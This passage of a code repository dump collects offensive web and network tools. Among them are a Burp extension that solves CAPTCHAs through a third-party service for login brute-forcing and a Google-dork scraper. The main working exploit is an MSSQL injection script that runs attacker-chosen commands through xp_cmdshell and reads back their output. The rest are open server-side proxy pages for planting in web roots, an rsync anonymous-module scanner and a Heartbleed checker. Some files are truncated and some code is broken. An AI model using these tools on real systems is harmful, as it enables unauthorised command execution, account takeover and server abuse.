            "sign":sign,
            'cardid':cardid,
            'csign':csign
        }
        url = self.host + "/api/charge"
        rsp = HttpRequest(url, param)
        if rsp.ret_code == 0:
            LOG("charge succ ret: {} request_id: {} pred: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.pred_rsp.value, rsp.err_msg))
        else:
            LOG("charge failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
        return rsp

    ##
    # Top up, returning only whether it succeeded
    # Parameters: cardid: top-up card number   cardkey: top-up card signature string
    # Returns: 0 when the top-up succeeded
    ##
    def ChargeExtend(self, cardid, cardkey):
        return self.Charge(cardid,cardkey).ret_code

    ##
    # Request a refund, returning only whether it succeeded
    # Parameters: request_id: the order number to refund
    # Returns: 0 when the refund succeeded
    #
    # Note:
    #   Predict only charges when ret_code == 0, so a refund request is only
    #   needed in that case; otherwise no refund is required.
    # Note 2:
    #   Refunds are only for results that were returned normally but did not
    #   pass the web site's verification. Do not use this illegitimately or
    #   abuse it, or the account may be banned.
    #
    # NOTE(review): Justice() returns None for an empty request_id, in which
    # case the attribute access below raises AttributeError.
    ##
    def JusticeExtend(self, request_id):
        return self.Justice(request_id).ret_code

    ##
    # Query the balance, returning only the balance
    # Parameters: none
    # Returns: rsp.cust_val: the balance
    ##
    def QueryBalcExtend(self):
        rsp = self.QueryBalc()
        return rsp.cust_val

    ##
    # Recognise a CAPTCHA from a file, returning only the result
    # Parameters: pred_type: recognition type   file_name: file name
    # Returns: rsp.pred_rsp.value: the recognition result
    ##
    def PredictFromFileExtend( self, pred_type, file_name):
        rsp = self.PredictFromFile(pred_type,file_name)
        return rsp.pred_rsp.value

    ##
    # Recognition interface, returning only the result
    # Parameters: pred_type: recognition type   img_data: the image data
    # Returns: rsp.pred_rsp.value: the recognition result
    ##
    def PredictExtend(self,pred_type, img_data):
        rsp = self.Predict(pred_type,img_data)
        return rsp.pred_rsp.value
350 |
351 |
352 |
class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory, IIntruderPayloadProcessor):
    """Burp extension entry point: registers an Intruder payload generator and a payload processor."""

    #
    # implement IBurpExtender
    #

    def registerExtenderCallbacks(self, callbacks):
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()

        # set our extension name
        callbacks.setExtensionName("Captcha Crack")

        # register ourselves as an Intruder payload generator
        callbacks.registerIntruderPayloadGeneratorFactory(self)

        # register ourselves as an Intruder payload processor
        callbacks.registerIntruderPayloadProcessor(self)

    #
    # implement IIntruderPayloadGeneratorFactory
    #

    def getGeneratorName(self):
        return "Captcha Crack"

    def createNewInstance(self, attack):
        # return a new IIntruderPayloadGenerator to generate payloads for this attack
        return IntruderPayloadGenerator()

    #
    # implement IIntruderPayloadProcessor
    #

    def getProcessorName(self):
        return "Serialized input wrapper"

    def processPayload(self, currentPayload, originalPayload, baseValue):
        """Replace the ``input=`` value inside the base64/URL-encoded base value with the payload.

        NOTE(review): index() raises ValueError when the substring is missing;
        it never returns -1, and ``start`` has 6 added before it is compared.
        Both ``== -1`` branches below are therefore dead, and a base value
        without "input=" or without a following "&" raises instead of falling
        back. find() is the call that returns -1.
        """
        # decode the base value
        dataParameter = self._helpers.bytesToString(
            self._helpers.base64Decode(self._helpers.urlDecode(baseValue)))

        # parse the location of the input string in the decoded data
        start = dataParameter.index("input=") + 6
        if start == -1:
            return currentPayload

        prefix = dataParameter[0:start]
        end = dataParameter.index("&", start)
        if end == -1:
            end = len(dataParameter)

        suffix = dataParameter[end:len(dataParameter)]

        # rebuild the serialized data with the new payload
        dataParameter = prefix + self._helpers.bytesToString(currentPayload) + suffix
        return self._helpers.stringToBytes(
            self._helpers.urlEncode(self._helpers.base64Encode(dataParameter)))
415 |
416 | #
417 | # class to generate payloads from a simple list
418 | #
419 |
class IntruderPayloadGenerator(IIntruderPayloadGenerator):
    """Payload generator whose every payload is a freshly recognised CAPTCHA value.

    For site owners: this shows a CAPTCHA being answered by an external
    recognition service, so a CAPTCHA on its own does not bound the number of
    login attempts; attempt limits and lockout have to be enforced separately.
    """

    def __init__(self):
        # Set here and in reset(); nothing in this class reads or advances it.
        self._payloadIndex = 0

    def hasMorePayloads(self):
        # Always True: the generator never signals exhaustion.
        return True

    def getNextPayload(self, baseValue):
        # Fetch a CAPTCHA image using the module-level URL and headers
        # (which include a fixed session cookie).
        req = urllib2.Request(captcha_url, headers=headers)
        response = urllib2.urlopen(req)
        # NOTE(review): ./tmp must already exist, the image files are never
        # deleted, and the image is sent to a third-party service.
        filename = "./tmp/"+str(uuid.uuid1())+".png"
        with open(filename, "wb") as f:
            f.write(response.read())
        # Upload to the CAPTCHA-recognition platform.
        api = FateadmApi(app_id, app_key, pd_id, pd_key)
        rsp = api.PredictFromFile(pred_type, filename) # returns the detailed recognition result
        # value is None when the service returned no result; it is passed on unchecked.
        payload = rsp.pred_rsp.value
        return payload

    def reset(self):
        self._payloadIndex = 0
441 |
--------------------------------------------------------------------------------
/misc/gettitle.py:
--------------------------------------------------------------------------------
1 | import sys, urllib2, time, os , Queue, threading,re
2 |
3 | def cslogo():
4 | print '''
5 | ___ ___ ____ ____ ____ __ __ _ _
6 | / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
7 | ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
8 | \___)\___/(____/(____)(__) (____)(__)(__)(__)
9 | Name:get title exploit
10 |
11 | '''
12 |
13 | # show message
def msg(text, type=0):
    """Print *text* behind a status tag: "[*]" for 0, "[+]" for 1, "[-]" otherwise."""
    tag = "[*]" if type == 0 else ("[+]" if type == 1 else "[-]")
    print(tag + text)
22 |
def find_text(text, start, end):
    """Return the shortest text between *start* and *end* in *text*, or "none".

    Both delimiters are spliced into the pattern unescaped, so regex
    metacharacters in them are interpreted as regex syntax.
    """
    pattern = '%s(.*?)%s' % (start, end)
    found = re.search(pattern, text)
    return found.group(1) if found is not None else "none"
29 |
30 | def gbk2utf8(text):
31 | data=unicode(text,"gb2312")
32 | return data.encode("utf-8")
33 |
34 | # get url data
def get(url):
    """Fetch *url* with a 20 second timeout; return the body, or "none" on any failure."""
    try:
        return urllib2.urlopen(url, timeout=20).read()
    except:
        # Every exception, whatever its type, is reported as the string "none".
        return "none"
41 |
def post(url,data):
    """POST *data* to *url* (30 second timeout) and return the response body.

    For an HTTP error status the error response's body is returned instead;
    other exceptions propagate.
    """
    try:
        reply = urllib2.urlopen(url, data, timeout=30)
    except urllib2.HTTPError as error:
        return error.read()
    return reply.read()
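def file_to_arr(file):
    """Return the lines of *file* as a list, each stripped of surrounding whitespace."""
    # The original never closed the handle; the with-block releases it even
    # when reading fails.
    with open(file) as handle:
        return [line.strip() for line in handle]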
54 |
55 |
def exploit(i):
    """Fetch http://<i> and print "<i> - <extracted text>" when the request succeeded."""
    body = get("http://" + i).lower()
    if body == "none":
        return
    # NOTE(review): both delimiters are empty strings as shown on this page;
    # they may have been lost in extraction -- confirm against the original.
    print(i + " - " + find_text(body, "", "") + "\r")
class Worker(threading.Thread):
    """Thread that drains the shared ``data_queue``, calling exploit() on each entry."""

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # empty() followed by get() is not atomic across several workers.
        while not data_queue.empty():
            exploit(data_queue.get())
70 |
71 |
if __name__ == '__main__':
    # Usage: <script> <host list file> <thread count>
    cslogo()
    msg("Get Title exploit")

    file = sys.argv[1]
    arr = file_to_arr(file)
    # Never start more threads than there are entries.
    thread = min(int(sys.argv[2]), len(arr))
    msg("file:%s iplist:%d thread:%s" % (file, len(arr), thread))

    data_queue = Queue.Queue()
    msg("generate ip queue ...")
    for entry in arr:
        data_queue.put(entry)

    for _ in range(thread):
        Worker().start()
    # The workers are not daemon threads, so they keep running after this call.
    sys.exit(0)
90 |
--------------------------------------------------------------------------------
/misc/google.php:
--------------------------------------------------------------------------------
1 | #!/usr/bin/php
2 | .*/im';
11 | preg_match_all($preg, $content, $m);
12 | preg_match_all('/(.*?)/', $m[0][0], $ms);
13 |
14 | $list = array();
15 | foreach ($ms[1] as $link)
16 | {
17 | preg_match('/http:\/\/[a-zA-Z0-9._-]*/', $link, $matches);
18 | if (!empty($matches[0]))
19 | {
20 | $list[] = $matches[0];
21 | }
22 | }
23 | $list = array_unique($list);
24 | return $list;
25 | }
26 |
27 |
28 |
29 |
30 | $GOOGLEDORK = "inurl:news.php;
31 |
32 | echo "Result file [Enter for None]: \r\n";
33 | $result = trim(fgets(STDIN));
34 |
35 | if($result==NULL){$result=_RESULT;}
36 |
37 |
38 | if(file_exists("$result")){
39 | @unlink("$result");
40 | echo "Clear Cache ...\r\n";
41 | }
42 |
43 |
44 |
45 | $page = 20;
46 | $num = 100;
47 | for ($i=1;$i<=$page;$i++)
48 | {
49 | $url = geturl($GOOGLEDORK, $i, $num);
50 | print_r('[+] Page: '.$i.' Results Count: '.count($url)."\r\n");
51 | foreach ($url as $u)
52 | {
53 | #print_r($u."\r\n");
54 | @$fp=@fopen('tmp','a');
55 | @fwrite($fp,$u."\r\n");
56 | @fclose($fp);
57 |
58 | }
59 | }
60 | $new_filename="$result";
61 | $file=file('tmp');
62 | $array=preg_replace('/($\s*$)|(^\s*^)/m','',$file);
63 | foreach ($array as $key=>$r){
64 |
65 | $array[$key]=trim("$r");
66 |
67 | }
68 | $names=dirname(__FILE__).DIRECTORY_SEPARATOR.$new_filename;
69 | $new_array=array_values(array_unique($array));
70 |
71 | if(file_put_contents("$new_filename",join("\r\n",$new_array)))
72 |
73 | {
74 | echo "Get Subdomain Success!\r\n\r\n";
75 | usleep(100000);
76 | echo "Save To:\r\n". $names."\r\n\r\n";
77 |
78 |
79 | if(file_exists('tmp'))
80 | {
81 | @unlink('tmp');
82 | echo "Clear Cache ...\r\n\r\n";
83 |
84 | }
85 | }else {
86 | echo "\r\n[!] Failed! Connect Google Error!\r\n ";
87 | echo "\r\n[-] Plase Proxy...\r\n";
88 | }
89 |
90 |
91 | exit;
92 | ?>
93 |
--------------------------------------------------------------------------------
/misc/mssql-sql-inject-execute.py:
--------------------------------------------------------------------------------
1 | import sys, urllib2, time, os , Queue, threading,re,string
2 |
3 | def cslogo():
4 | print '''
5 | ___ ___ ____ ____ ____ __ __ _ _
6 | / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
7 | ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
8 | \___)\___/(____/(____)(__) (____)(__)(__)(__)
9 | Name:get title exploit
10 |
11 | '''
12 |
13 | # show message
def msg(text, type=0):
    """Print *text* behind a status tag: "[*]" for 0, "[+]" for 1, "[-]" otherwise."""
    tag = "[*]" if type == 0 else ("[+]" if type == 1 else "[-]")
    print(tag + text)
22 |
def find_text(text, start, end):
    """Return the longest text between *start* and *end* on one line of *text*, or "none".

    The capture is greedy, and both delimiters are spliced into the pattern
    unescaped, so regex metacharacters in them are interpreted as regex syntax.
    """
    pattern = '%s(.*)%s' % (start, end)
    found = re.search(pattern, text)
    return found.group(1) if found is not None else "none"
29 |
30 | def gbk2utf8(text):
31 | data=unicode(text,"gb2312")
32 | return data.encode("utf-8")
33 |
34 | # get url data
def get(url):
    """Fetch *url* with a 20 second timeout; return the body, or "none" on any failure."""
    try:
        return urllib2.urlopen(url, timeout=20).read()
    except:
        # Every exception, whatever its type, is reported as the string "none".
        return "none"
41 |
def post(url,data):
    """POST *data* to *url* with a fixed Cookie header; return the response body.

    For an HTTP error status the error response's body is returned instead.
    NOTE(review): session cookie values are embedded in the source below.
    """
    try:
        client = urllib2.build_opener()
        client.addheaders.append(('Cookie', '__utma=79235852.287466356.1385124666.1385124666.1385213546.2; __utmz=79235852.1385124666.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAQDRACBC=OJMFPBPBILEDANAEOPGAMIGL; st8id=1e1bcc1010b6de32734c584317443b31.00.cc781be5683b8a8f6de679b0911732d2; ASPSESSIONIDCQBRBCBD=CGGBLCJCFMAAGPFKJAEEHAOC; ASPSESSIONIDCQARBDBD=JLKPAILCMMBNGNGDLLPLFKGH; ASPSESSIONIDAQATDAAC=MGHBOLDDOLLGPOHMDBMDLDIL'))
        reply = client.open(url, data, timeout=30)
        return reply.read()
    except urllib2.HTTPError as error:
        return error.read()
50 |
51 |
if __name__ == '__main__':
    # Sends a fixed sequence of POSTs to a placeholder URL. In each one the
    # `iid` form field carries a quote followed by additional SQL statements,
    # and parts of the SQL keywords are written as %uXXXX escapes.
    #
    # For defenders: the application side fix is a parameterised query for
    # `iid`; on the database side the web application's login should not be
    # able to create or drop tables or run xp_cmdshell, which should stay
    # disabled. Request logs need their %uXXXX escapes decoded before any
    # keyword matching is applied.

    cslogo()
    # The first command-line argument is concatenated into the second request unchanged.
    cmd=sys.argv[1];
    msg("mssql sql cmd exploit")
    #create thread= thread if thread< len(arr) else len(arr)
    # Request 1: drops and re-creates a scratch table named xxoo.
    post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20employee),4%20;DROP%20TABLE%20xxoo;create%20table%20xxoo(id%20int%20identity(1,1),dir%20ntext);--")
    #execute
    # Request 2: stores the output of xp_cmdshell in that table.
    post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;insert%20xxoo%20exec%20%u004daster.dbo.%u0078p_cmdshell%20'"+cmd+"'; --")
    #fetch count
    # Request 3: reads the row count of the table back through the page output.
    html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;--")
    # NOTE(review): both delimiters are empty strings as shown on this page;
    # they may have been lost in extraction -- confirm against the original.
    i=find_text(html,'','')
    where="%20where%20id=1),4%20;--";
    res="none";
    if i != "none" :
        msg("result rows: %s" % i);
        # One request per row: reads the stored output back one row at a time.
        for t in range(int(i)):
            where="%20where%20id="+str(t)+"),4%20;--";
            html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20top%201%20dir%20from%20xxoo"+where)
            res=find_text(html,'','')
            print res
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/misc/php-ftp.php:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/misc/proxy.asp:
--------------------------------------------------------------------------------
<%
' Server-side fetch relay: requests the address given in the "url" request
' parameter from the web server itself and writes the response text back.
' NOTE(review): the address is used exactly as supplied (no scheme, host or
' port restriction) and the fetched text is written to the page unencoded, so
' any client that can reach this page can make the server issue requests and
' have arbitrary markup rendered under the site's origin. A file like this in
' a web root should be treated as unexpected and removed.

Set objXML = Server.CreateObject("MSXML2.ServerXMLHTTP")
objXML.open "GET",request("url"),false

objXML.send()

response.write objXML.responseText

%>
--------------------------------------------------------------------------------
/misc/proxy.cfm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 | #cfhttp.filecontent#
11 |
12 |
--------------------------------------------------------------------------------
/misc/proxy.jsp:
--------------------------------------------------------------------------------
<%@ page contentType="text/html;charset=utf-8"%>
<%
// Server-side fetch relay: opens the URL given in the "u" request parameter
// from the web server and prints the response, with line breaks removed.
// NOTE(review): the URL is used exactly as supplied (no scheme or host
// restriction), the connection is cast to HttpURLConnection without a check,
// the reader and connection are never closed, and the fetched text is printed
// unencoded. A file like this in a web application should be treated as
// unexpected and removed.
String sCurrentLine;
String sTotalString;
sCurrentLine="";
sTotalString="";
String url=request.getParameter("u");
java.io.InputStream l_urlStream;
java.net.URL l_url = new java.net.URL(url);
java.net.HttpURLConnection l_connection = (java.net.HttpURLConnection) l_url.openConnection();
l_connection.connect();
l_urlStream = l_connection.getInputStream();
// The response is decoded as UTF-8 whatever charset the remote side declared.
java.io.BufferedReader l_reader = new java.io.BufferedReader(new java.io.InputStreamReader(l_urlStream,"utf-8"));
while ((sCurrentLine = l_reader.readLine()) != null)
{
    sTotalString+=sCurrentLine;
}
out.println(sTotalString);
%>
--------------------------------------------------------------------------------
/misc/proxy.php:
--------------------------------------------------------------------------------
1 | Type:$rtype Url:$curl
";
16 |
17 | switch ($rtype) {
18 | case "get" : get($curl); break;
19 | case "post" : post($curl,$_GET); break;
20 |
21 | }
22 |
23 |
24 |
25 |
26 | }else{
27 |
28 | echo "[+] php cute proxy script
http https get post file ftp ";
29 |
30 | }
31 |
/**
 * Read $url on the server and echo what was read.
 *
 * file_get_contents() accepts any registered stream wrapper, so whoever
 * supplies $url decides whether a remote address or a local path is read,
 * and the result is echoed without encoding.
 */
function get($url){
    $body = file_get_contents($url);
    echo $body;
}
37 |
38 |
/**
 * Read $url on the server and echo what was read; when $post is an array it
 * is sorted by key and sent as the body of an HTTP POST.
 *
 * $url is passed to file_get_contents() unchanged and the result is echoed
 * without encoding.
 */
function post($url, $post = null)
{
    $options = array();

    if (is_array($post)) {
        ksort($post);
        $options['http'] = array(
            'method'  => 'POST',
            'content' => http_build_query($post, '', '&'),
        );
    }

    $stream = stream_context_create($options);
    echo file_get_contents($url, false, $stream);
}
56 |
57 |
58 |
59 |
60 |
61 |
62 | ?>
63 |
--------------------------------------------------------------------------------
/misc/rsync.py:
--------------------------------------------------------------------------------
1 |
2 | from common import *
3 | import sys, socket, time, os, subprocess, Queue
4 | from subprocess import *
5 | from lib.ThreadGetKey import *
6 |
7 |
8 | NORMAL = 0
9 | ERROR = 1
10 | TIMEOUT = 5
11 |
class ThreadGetKey(threading.Thread):
    """Watcher thread: read one console key and hard-exit the process on 'q'."""

    def run(self):
        try:
            pressed = msvcrt.getch()
            if pressed != 'q':
                return
            print("stopped by your action ( q )")
            os._exit(1)
        except:
            # Any failure while reading the key also terminates the process.
            os._exit(1)
21 |
22 |
def ping(ip , port , timeout=10):
    """Report whether a TCP port answers -- as written, always returns 1.

    NOTE(review): the unconditional ``return 1`` on the first line makes the
    connect probe below unreachable, so callers treat every host as up. If it
    is a leftover debugging stub it should be removed -- confirm intent.

    The unreachable code would return 1 when connect_ex() reports success,
    ERROR (which is also 1) when an exception is raised, and 0 otherwise, so a
    caller could not tell "connected" from "exception". Its success path also
    returns before cs.close() is reached.
    """
    return 1
    try:
        cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        cs.settimeout(float(timeout))
        address = (str(ip), int(port))
        status = cs.connect_ex((address))
        if status == NORMAL :
            return 1;
    except Exception , e:
        print ERROR
        print "error:%s" % e
        return ERROR
    cs.close()
    return 0
38 |
39 |
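def rsync(file):
    """Queue every line of *file* as a host and process the queue with 20 threads.

    Each line is stripped and put on the module-global ``host_list`` queue.
    When at least one line was read, a ThreadGetKey watcher is started as a
    daemon thread and 20 RsyncCarck workers are started and joined; otherwise
    "No Hosts" is reported.
    """
    global host_list
    host_list = Queue.Queue()
    # The original iterated over open(file) and never closed it; the
    # with-block releases the handle as soon as the list has been read.
    with open(file, 'r') as host_file:
        for host in host_file:
            host_list.put(host.strip())
    l = host_list.qsize()
    threads = []
    if l > 0:
        msg("Pentest %d hosts" % l)
        hander = ThreadGetKey()
        hander.setDaemon(True)
        hander.start()
        for i in range(20):
            # The constructor argument is a placeholder; workers read the queue.
            a = RsyncCarck("xx")
            a.start()
            threads.append(a)
        for j in threads:
            j.join()
    else:
        msg("No Hosts")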
60 |
61 |
class RsyncCarck(threading.Thread):
    """Worker thread: take hosts from ``host_list`` and list their rsync modules.

    For administrators reading this: an rsync daemon module is only reported
    here when it answers an unauthenticated client, so modules protected with
    ``auth users`` / ``secrets file`` and restricted by ``hosts allow`` in
    rsyncd.conf are the relevant hardening.
    """

    def __init__(self, host):
        threading.Thread.__init__(self)
        # Stored but never read by run(), which takes its hosts from the queue.
        self.host = host

    def run(self):
        while 1:
            # NOTE(review): empty() followed by get() is not atomic; with several
            # workers, get() can block forever once another thread took the last item.
            if host_list.empty() == True:
                break
                os.exit()  # unreachable (after break)
            time.sleep(1)
            host = str(host_list.get())
            msg("Pentest "+host+" rsync")
            if ping(host, 873):
                msg("Rsync server running", 1)
                rsync_client = "bin\\rsync.exe "; # rsync client path
                # NOTE(review): the command line is built by string concatenation
                # from a line of the host file and handed to os.popen(), i.e. to a
                # shell. Shell metacharacters in that file would be interpreted on
                # the operator's own machine; an argument list passed to
                # subprocess avoids the shell.
                pipe = os.popen(rsync_client + host + "::")
                msg_text = pipe.read()
                pipe.close()
                msg_arr=[]
                if msg_text :
                    msg_arr = msg_text.split('\n')
                if len(msg_arr) > 0:
                    # The count includes empty strings produced by split('\n').
                    msg("%d modules Found" % len(msg_arr), 1)
                    for module in msg_arr :
                        if module :
                            msg("Test %s::%s" % (host,module));
                            module = module.strip()
                            p = Popen(rsync_client + host + "::" + module, stdin=PIPE, stdout=PIPE)
                            req = p.stdout.readline()
                            # NOTE(review): `req and "@ERROR"` evaluates to the literal
                            # "@ERROR" whenever req is non-empty, so this condition is
                            # true for any line read and never inspects its content;
                            # the "Anonymous" message below is therefore not evidence
                            # that access was granted.
                            if req and len(req and "@ERROR") :
                                msg("Anonymous rsync module:" + module + " found !!!", 1)
                            else :
                                print req
                        else :
                            continue
                else :
                    msg("No modules Found", 2)
100 |
101 |
102 |
103 |
104 |
105 |
106 |
--------------------------------------------------------------------------------
/misc/security-bulletins.list:
--------------------------------------------------------------------------------
1 | name,url
2 | wordpress,http://wordpress.org/news/category/security/
3 | nginx,http://nginx.org/en/security_advisories.html
4 | phpmyadmin,https://www.phpmyadmin.net/security/feed/
5 | mongodb,https://www.mongodb.com/alerts
6 | openssl,http://www.openssl.org/news/vulnerabilities.html
7 | ubuntu,http://www.ubuntu.com/usn/
8 | redhat,https://securityblog.redhat.com/category/security/feed/
9 | joomla,https://developer.joomla.org/security-centre.html
10 | drupal,https://www.drupal.org/security/rss.xml
11 | struts,https://struts.apache.org/docs/security-bulletins.html
12 | tomcat,https://tomcat.apache.org/security-9.html
13 | apache_22,https://httpd.apache.org/security/vulnerabilities_22.html
14 | camel,https://camel.apache.org/security-advisories.html
15 | nodejs,https://nodesecurity.io/advisories
16 | ruby,https://www.ruby-lang.org/en/security/
17 | phpcms,http://update.v9.phpcms.cn/index.php?action=notice
18 | apache_24,https://httpd.apache.org/security/vulnerabilities_24.html
19 | discuz,http://www.discuz.net/forum-10-1.html
20 | jenkins,https://wiki.jenkins-ci.org/display/SECURITY/Home
21 | hackerone,https://hackerone.com/hacktivity?sort_type=popular&filter=type%3Aall&page=1
22 |
--------------------------------------------------------------------------------
/misc/ssltest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
4 | # The author disclaims copyright to this source code.
5 |
6 | import sys
7 | import struct
8 | import socket
9 | import time
10 | import select
11 | import re
12 | from optparse import OptionParser
13 |
# Command-line interface: one positional argument (the server to test) plus
# an optional TCP port.
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)',
)
options.add_option(
    '-p', '--port',
    type='int',
    default=443,
    help='TCP port to test (default: 443)',
)
16 |
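def h2bin(x):
    """Convert a whitespace-separated hex dump into the bytes it spells.

    All whitespace (spaces, tabs, CR/LF) is dropped before decoding, so the
    multi-line literals below can be pasted as-is.  ``binascii.unhexlify``
    replaces ``str.decode('hex')``, which exists only on Python 2; the result
    is the same byte string there.

    Raises whatever ``binascii.unhexlify`` raises for an odd number of digits
    or a non-hex character.
    """
    import binascii

    return binascii.unhexlify(''.join(x.split()))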
19 |
# ClientHello, sent as a single TLS record.  Record header: content type 0x16
# (handshake), version 0x0302 (TLS 1.1), length 0x00dc.  The final extension,
# 00 0f 00 01 01, is the heartbeat extension (type 0x000f, one byte of data,
# mode 1), which tells the server this client accepts heartbeat messages.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat request used for the check.  Record header: content type 0x18
# (heartbeat), version 0x0302, record length 3.  Body: message type 01
# (request) and a declared payload length of 0x4000, with no payload or
# padding bytes following.  RFC 6520 requires a receiver to silently discard a
# message whose declared payload length does not fit in the record, so a
# patched server sends nothing back.  For network detection the same mismatch
# is the indicator: a heartbeat record whose declared payload length exceeds
# the record length.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
42 |
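def hexdump(s):
    """Print the printable ASCII characters of *s* on a single line.

    Despite the name, no hex or offset columns are printed: characters
    outside 0x20..0x7e are dropped and the rest are written as one string
    followed by a newline.  The unused hex-column computation and the
    commented-out print from the earlier version are removed, and the output
    is built with one join instead of repeated concatenation.

    The data printed here is whatever the tested server returned, which on a
    vulnerable host can include secrets; treat captured output accordingly.
    """
    printable = [c for c in s if 32 <= ord(c) <= 126]
    print(''.join(printable))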
52 |
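def recvall(s, length, timeout=5):
    """Read exactly *length* bytes from socket *s*.

    Returns the bytes read, or ``None`` if the peer closes the connection or
    *timeout* seconds pass before *length* bytes have arrived.

    The remaining time is now passed to ``select`` on every iteration.  The
    earlier version computed it but always waited a fixed 5 seconds, so a
    short timeout was not honoured and a long one could overrun.
    """
    deadline = time.time() + timeout
    chunks = []
    remain = length
    while remain > 0:
        rtime = deadline - time.time()
        if rtime < 0:
            return None
        readable, _, _ = select.select([s], [], [], rtime)
        if s in readable:
            data = s.recv(remain)
            # An empty read means the peer closed the connection.
            if not data:
                return None
            chunks.append(data)
            remain -= len(data)
    return b''.join(chunks)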
70 |
71 |
def recvmsg(s):
    """Read one TLS record from *s*.

    Returns ``(type, version, payload)``, or ``(None, None, None)`` when the
    5-byte record header or the payload cannot be read.  ``recvall`` reports a
    timeout the same way as a closed connection, so the "EOF" messages below
    cover both cases.
    """
    header = recvall(s, 5)
    if header is None:
        print('Unexpected EOF receiving record header - server closed connection')
        return None, None, None

    # Record header: 1-byte content type, 2-byte version, 2-byte length.
    rec_type, rec_ver, rec_len = struct.unpack('>BHH', header)

    payload = recvall(s, rec_len, 10)
    if payload is None:
        print('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None

    summary = ' ... received message: type = %d, ver = %04x, length = %d'
    print(summary % (rec_type, rec_ver, len(payload)))
    return rec_type, rec_ver, payload
84 |
def hit_hb(s):
    """Send the heartbeat request and classify the server's reaction.

    Records are read until one of three things happens:

    * no record can be read            -> returns False
    * an alert record (type 21)        -> returns False
    * a heartbeat record (type 24)     -> returns True

    True means a heartbeat response arrived; whether the server is reported
    as vulnerable depends on the response being longer than the 3 bytes that
    were sent.  Records of any other type are skipped.
    """
    s.send(hb)
    while True:
        rec_type, _ver, payload = recvmsg(s)

        if rec_type is None:
            print('No heartbeat response received, server likely not vulnerable')
            return False

        if rec_type == 21:
            print('Received alert:')
            hexdump(payload)
            print('Server returned error, likely not vulnerable')
            return False

        if rec_type == 24:
            print('Received heartbeat response:')
            hexdump(payload)
            if len(payload) <= 3:
                print('Server processed malformed heartbeat, but did not return any extra data.')
            else:
                print('WARNING: server returned more data than it should - server is vulnerable!')
            return True
107 |
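def main():
    """Run one heartbeat check against the server named on the command line.

    Connects to ``args[0]`` on the selected port, sends the ClientHello, waits
    for the server's handshake flight to finish, then hands the socket to
    ``hit_hb``.  Prints usage and returns when no server is given.

    Changes from the earlier version:

    * the socket is closed on every exit path (this function is called in a
      loop, so each pass used to leave a socket open);
    * an empty handshake record no longer raises ``IndexError``;
    * the heartbeat is sent once, by ``hit_hb``, rather than once here and
      once again there.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print('Connecting...')
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print('Sending Client Hello...')
        sys.stdout.flush()
        s.send(hello)
        print('Waiting for Server Hello...')
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print('Server closed connection without sending Server Hello.')
                return
            # Look for server hello done message: a handshake record (22)
            # whose first byte is 0x0E.  NOTE(review): this only inspects the
            # first handshake message of each record, so it presumably relies
            # on the server sending ServerHelloDone in a record of its own.
            if typ == 22 and pay and ord(pay[0:1]) == 0x0E:
                break

        print('Sending heartbeat request...')
        sys.stdout.flush()
        # hit_hb() sends the request itself before reading the reply.
        hit_hb(s)
    finally:
        s.close()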
136 |
if __name__ == '__main__':
    # Repeat the check every 3 seconds until the process is interrupted.
    # Each pass goes through main() again, i.e. a new connection and a new
    # heartbeat request to the same server.
    while True:
        main()
        time.sleep(3)
143 |
144 |
--------------------------------------------------------------------------------
/misc/tasklist.vbs:
--------------------------------------------------------------------------------
1 | ''''''''''''''''''''''''''''''''''''
2 | ' tasktool.vbs@b4dboy
3 | ''''''''''''''''''''''''''''''''''''
4 |
